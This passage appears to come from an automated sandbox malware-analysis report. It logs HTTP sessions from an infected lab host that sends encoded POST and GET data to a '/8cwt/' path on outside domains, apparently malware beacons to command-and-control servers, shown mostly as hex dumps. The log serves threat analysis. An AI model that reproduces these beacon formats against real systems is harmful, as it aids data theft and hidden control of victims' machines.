                                      Data Raw: 32 34 65 6c 75 58 3d 6f 38 61 74 65 31 71 36 4d 71 6f 6f 38 42 6a 59 50 62 43 53 74 2f 36 50 5a 63 37 75 79 68 7a 41 75 2f 73 74 73 33 72 57 57 6a 34 4f 50 77 69 39 2f 43 66 68 2b 34 4c 6e 55 6f 6b 37 4d 58 52 55 36 4b 78 52 73 4c 46 64 4e 67 32 4a 76 50 34 72 5a 34 64 39 74 71 57 72 67 55 6c 4b 65 6e 61 36 5a 38 46 52 73 36 49 4f 67 2f 5a 68 34 69 59 6c 43 45 4c 75 67 6f 70 49 65 55 2f 44 34 67 56 6a 67 4b 5a 66 6e 6c 46 58 52 67 53 65 2b 43 35 77 73 77 76 32 64 32 53 78 45 43 38 62 68 32 34 4e 45 64 6d 70 51 33 32 4f 2f 6e 55 48 62 59 74 41 6d 7a 54 50 50 4c 47 66 6a 2b 6b 75 37 6c 53 4d 37 6c 64 62 62 53 65 6e 7a 58 39 6e 65 68 33 57 72 4a 73 71 41 35 45 3d
                                      Data Ascii: 24eluX=o8ate1q6Mqoo8BjYPbCSt/6PZc7uyhzAu/sts3rWWj4OPwi9/Cfh+4LnUok7MXRU6KxRsLFdNg2JvP4rZ4d9tqWrgUlKena6Z8FRs6IOg/Zh4iYlCELugopIeU/D4gVjgKZfnlFXRgSe+C5wswv2d2SxEC8bh24NEdmpQ32O/nUHbYtAmzTPPLGfj+ku7lSM7ldbbSenzX9neh3WrJsqA5E=
                                      Jun 4, 2024 14:22:43.795527935 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:42 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r [TRUNCATED]
                                      Jun 4, 2024 14:22:43.795547009 CEST300INData Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69
                                      Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      64192.168.11.3049913162.43.104.16480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:46.956729889 CEST1638OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 6f 38 61 74 65 31 71 36 4d 71 6f 6f 38 42 6a 59 50 62 43 53 74 2f 36 50 5a 63 37 75 79 68 7a 41 75 2f 73 74 73 33 72 57 57 6a 77 4f 50 44 71 39 74 6a 66 68 39 34 4c 6e 4b 34 6b 36 4d 58 52 4a 36 4b 35 4e 73 4c 49 71 4e 6d 79 4a 75 74 77 72 52 74 39 39 6d 71 57 72 69 55 6c 4a 61 6e 61 72 5a 36 6c 56 73 36 59 4f 67 2f 5a 68 34 68 41 6c 46 51 58 75 69 6f 70 4c 4f 45 2f 66 38 67 55 30 67 4b 42 70 6e 6b 78 59 52 51 79 65 2f 6d 64 77 70 44 58 32 43 47 53 7a 48 43 38 44 68 33 45 43 45 65 53 54 51 33 43 6b 2f 6e 73 48 62 64 55 73 68 52 37 73 65 4e 53 66 69 39 63 73 74 47 43 7a 30 48 70 39 4c 45 79 36 78 47 64 73 66 6d 44 64 37 4d 73 57 56 59 44 31 7a 4b 79 58 6a 34 32 6f 42 45 55 4d 31 30 42 6f 78 31 66 49 6a 2f 55 30 72 76 37 4e 6a 77 55 70 57 4b 42 6a 41 2b 64 58 31 44 35 6c 67 4d 6d 62 44 4f 75 55 2f 4c 49 44 70 4c 59 66 6d 79 4e 31 47 6a 4f 6f 7a 6a 34 36 76 42 6f 77 56 47 6a 49 48 63 74 73 78 30 31 4f 2b 76 4c 48 46 75 39 58 31 69 56 46 64 56 74 37 2f 30 7a 37 64 61 44 61 45 75 4c [TRUNCATED]
                                      Data Ascii: 24eluX=o8ate1q6Mqoo8BjYPbCSt/6PZc7uyhzAu/sts3rWWjwOPDq9tjfh94LnK4k6MXRJ6K5NsLIqNmyJutwrRt99mqWriUlJanarZ6lVs6YOg/Zh4hAlFQXuiopLOE/f8gU0gKBpnkxYRQye/mdwpDX2CGSzHC8Dh3ECEeSTQ3Ck/nsHbdUshR7seNSfi9cstGCz0Hp9LEy6xGdsfmDd7MsWVYD1zKyXj42oBEUM10Box1fIj/U0rv7NjwUpWKBjA+dX1D5lgMmbDOuU/LIDpLYfmyN1GjOozj46vBowVGjIHctsx01O+vLHFu9X1iVFdVt7/0z7daDaEuLwFXBcvxWQsUm/OsWjZlbluP82DaWf59avvSOb9oxduX0VYYYkhr0OhAl/L1blhCy6ZQzXhvtWYWyucux2zOvYBqbK3HBeYW5WZnVTVfnHvWsmIdl2jWLktdyqJ+COZDBMp3pt/khbBGVziXh+LEeVF+ASSPj4nQAodAUBhg50WSDnsfF7W6Z3mrCyr7Wnc5DNe0oenDlgOGKPFHF0timkwlyVCTV4jcDHLM7tQspGq0xHpuRlO1GHLwWvnFSrQ7Tndhgw/ATIUDw4cfRKbbVLaxZqEp+vfQPvdFuz9FWRPYww1BNwJ1yQmno/ohclUe6g69PspmmQ9lyX03M3AaikHL1FaJ1vE9OW4r8DJ3bKM8IrGa6yazOd2kIkZdmfH6B3+KjiCNhQo9o8GT/TbzokJ09A18emwjZgJ5hPal90rueSb5vCHlB/GRX2/eRcHntskF+zgNQhnrPPF8+F/4ow90vsUqlGKAcR4djgqAv2jLMbLgML/vhsjroEG1uT+9PEjIdVSUA1ErEk1ShSITtbCkzXtdtUYz/NmgtqiHWNJrx6GJGUEoTJNI+jrl4lJQm2sFyRD+PBjMY8nx9GD6FWtBtqnR4AzYTSLH0WtHIXzdQt9uJ+Qh6HIIj3mdEY+GXOCRniS/FKc1hH1QRSQgRFEbYgbWkXoUIpN [TRUNCATED]
                                      Jun 4, 2024 14:22:47.265578985 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:45 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r [TRUNCATED]
                                      Jun 4, 2024 14:22:47.265599966 CEST300INData Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69
                                      Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      65192.168.11.3049914162.43.104.16480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:22:49.764624119 CEST432OUTGET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:22:50.039150953 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:48 GMT
                                      Content-Type: text/html
                                      Content-Length: 2814
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: "afe-6014d9a904f4f"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; [TRUNCATED]
                                      Jun 4, 2024 14:22:50.039277077 CEST1289INData Raw: 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 6c 69 6e
                                      Data Ascii: plain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; font
                                      Jun 4, 2024 14:22:50.039295912 CEST476INData Raw: a5 b8 a4 cf b8 ab a4 c4 a4 ab a4 ea a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 bb d8 c4 ea a4 b7 a4 bf a5 da a1 bc a5
                                      Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      66192.168.11.304991593.125.99.13480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:23:03.499651909 CEST680OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 37 4a 63 51 37 6f 49 41 62 76 67 52 52 33 79 37 58 38 55 4c 53 55 54 39 43 45 42 6e 74 33 79 56 66 70 4e 35 66 61 4b 61 42 68 6a 47 6d 4e 71 78 6c 75 67 35 72 72 43 55 5a 47 4c 33 57 4c 6f 6e 75 34 45 4c 4f 62 36 62 53 68 68 49 61 64 57 4c 72 52 50 2b 61 6e 56 37 4c 50 32 71 2b 58 4a 69 6c 4c 78 53 71 30 65 41 6b 63 36 39 48 78 42 61 63 48 37 72 6b 71 54 44 48 55 68 63 69 6f 5a 34 6b 47 55 50 31 6e 59 57 72 49 2b 58 6a 76 61 51 46 30 74 6d 64 54 35 6a 6e 50 47 30 39 2b 63 4e 72 46 4b 54 34 45 42 58 62 43 57 76 4e 71 68 48 79 69 6b 6b 65 71 64 36 5a 61 66 71 37 75 57 42 37 67 3d 3d
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRR3y7X8ULSUT9CEBnt3yVfpN5faKaBhjGmNqxlug5rrCUZGL3WLonu4ELOb6bShhIadWLrRP+anV7LP2q+XJilLxSq0eAkc69HxBacH7rkqTDHUhcioZ4kGUP1nYWrI+XjvaQF0tmdT5jnPG09+cNrFKT4EBXbCWvNqhHyikkeqd6Zafq7uWB7g==
                                      Jun 4, 2024 14:23:04.067943096 CEST1289INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:23:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Data Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 [TRUNCATED]
                                      Data Ascii: 33cb}kFfC&%7l4veHfF(,Z|aGqM]V_GP A6&$6YGf?"7rPPK/4H#;I;%P{ce!v8JRQ0j9]b:C?q`Pdh3(FZD? %d2fi~>S3JIXy%FC}D(G0C\hAtq'#@g>EO)_]3Mi}d I0h^/Nu^)03do~WoV~Wwo?~!}Du^K2<N$P )M/^h4?RvlzQ$k8|~3rLPc4;#slLkLz.S>/OykCk_3?%{J19}A@k$(/kX_5Q5M8$Zz(5\[ZqT3k)N$eE>SNs2BP*M})9JI24$W`oB~!66hWOp8])`jaLm.1z_W~V~n=\}5_Yt3+oVt7h|dq
                                      Jun 4, 2024 14:23:04.067985058 CEST1289INData Raw: 25 2d db d5 80 3a 97 c2 3a 00 ad fb 00 a9 be 0b fd 45 6c 08 35 58 5f c4 41 84 3d 5a 77 2c a7 59 b7 1a 75 d1 57 06 40 b2 4d 7a 0e 52 2d ca be d8 26 9b b7 04 c7 74 ad d6 6f 77 74 6d 46 fc e9 2c d5 fa 0d 5b d7 5c 1c 73 e9 d3 ee cb f8 a5 ae 31 1e ec
                                      Data Ascii: %-::El5X_A=Zw,YuW@MzR-&towtmF,[\s1e<[._-|T\&q65y!5LHpT4WL5$aw/E4@oVOEH{x0_aI_~vw;q)+IF_]3IS?R4D
                                      Jun 4, 2024 14:23:04.068135023 CEST1289INData Raw: 57 ab 6a ef be 5c 9b 85 69 4d 5f 28 65 f4 58 f9 f1 ca 3c 8b fc b0 aa e9 5a ed 5d ad 56 1b 68 7a c2 c4 09 50 56 5f 92 57 fa 35 28 8e be 06 23 b3 7e 86 cf b1 18 1f 4b 18 de a0 17 b8 42 a9 96 b4 a5 9a d4 f4 6b 58 b3 f5 b5 8b 18 3a 81 8f 02 29 fd f9
                                      Data Ascii: Wj\iM_(eX<Z]VhzPV_W5(#~KBkX:)=|(6BFjn519H>Va\+]E'U/V[l30(&QRec!"|L_T|eCpTRd0F-,=4?)h#[>A0jjAk5EJ
                                      Jun 4, 2024 14:23:04.068185091 CEST1289INData Raw: 6e 8e dd 6e e8 d0 d9 b6 73 a3 18 cd 7d 2f 04 75 b8 1b 87 de d0 6d a7 97 c1 6f 5a ba 6d b7 75 a7 b5 a5 f7 32 b3 c4 30 e8 1c 07 41 1f d9 8d f8 72 4d 1f 2b 85 c0 92 83 c1 e7 58 bb 4a 05 70 80 d9 47 8d f6 ae 42 97 86 28 d6 74 36 8a d1 18 bb 7e 38 35
                                      Data Ascii: nns}/umoZmu20ArM+XJpGB(t6~85#l62_#*+`EEV;[ovh[}"fJiKa8]$8v|M>aax}d^hY%jNsYE+V7?<5=kau6;kebFR5}j*
                                      Jun 4, 2024 14:23:04.068300009 CEST1289INData Raw: 69 b2 94 a6 92 d2 62 29 2d 25 a5 cd 52 da 4a 4a 87 a5 74 94 94 2e 4b e9 2a 29 3d 96 d2 cb 52 3a 8f 39 a9 ef 3e 0b f0 f8 cf 82 de a7 c0 7a 92 24 38 fd d3 27 f7 f0 6d ab d1 1d 88 fb 03 43 7a 81 63 9e 42 17 63 88 a6 e1 5e 25 7e 10 f8 2e 4f cc 7c 52
                                      Data Ascii: ib)-%RJJt.K*)=R:9>z$8'mCzcBc^%~.O|Rw-N!"IS.GIDiS?<Qe,wy;+0>{X{/}<Hbg{OuC^QD2J!>y\)NS<5hs'U"pC(\\\
                                      Jun 4, 2024 14:23:04.068320990 CEST1289INData Raw: 80 5c 7a 39 1e e4 ff 8e f1 9a 3d 9c 9b b0 52 4c 0f 0e 8e fd f9 54 4e 68 ed 8e 86 e4 34 d7 b0 b5 e2 94 99 57 06 fb 77 7d 99 be 3d 9c 93 54 85 38 4d b1 3b 03 2f 58 63 b2 08 02 04 0e 80 fc 1b 84 a8 81 10 52 b0 12 ef 68 08 07 e9 50 83 59 4b b6 84 a9
                                      Data Ascii: \z9=RLTNh4Ww}=T8M;/XcRhPYK;={JWPUvnH.4F9@)'t168R%@(p,3h`{eFMAyxLISF7o,J@<Ybf(/40Sqz>y$S
                                      Jun 4, 2024 14:23:04.068348885 CEST1289INData Raw: b9 3e 0e 98 5d 40 47 10 3d 7f e4 fa 89 1b 90 11 04 92 1d 91 c9 84 9d 4e b2 ad 5a b0 f5 05 82 9b 17 db 1c 8d d8 c7 bc 0d b2 fb ac c3 e0 88 85 1d 5d a1 67 ac 59 e8 13 37 0a 29 fa 12 1e 05 78 cc 9a 85 3e f6 83 00 7d c4 9a c5 23 fc 1f f0 73 50 38 2d
                                      Data Ascii: >]@G=NZ]gY7)x>}#sP8-b 4He\+Es?%$,4sq_El4@`t wmx#mrG|yg5: 6?v9=Vng-wDcnqdu1%z9-{74N
                                      Jun 4, 2024 14:23:04.068368912 CEST1289INData Raw: 2a 05 6e 1f c8 8b 0d 88 0f 70 b9 b5 21 9e 1e e0 11 e9 f9 d2 43 c4 75 84 88 9a 76 0b 64 19 d4 c1 da 3d 37 24 2e ba f1 35 df 9e e3 ad a0 17 58 94 c9 6d 5a 21 5f 6e 58 d6 f9 0c 28 90 ea c8 b8 54 15 92 32 c8 40 74 d7 77 6c 10 62 11 2e 3d 3f 21 ec 19
                                      Data Ascii: *np!Cuvd=7$.5XmZ!_nX(T2@twlb.=?!>w{FAFee6)'L;*lu8,Dh}ho]l)g*KN/4VJ(wcKg|trpC\^EXCnAM+wHzo46?f^#$aX
                                      Jun 4, 2024 14:23:04.068387032 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:23:04.068516016 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:23:04.068536997 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session IDSource IPSource PortDestination IPDestination Port
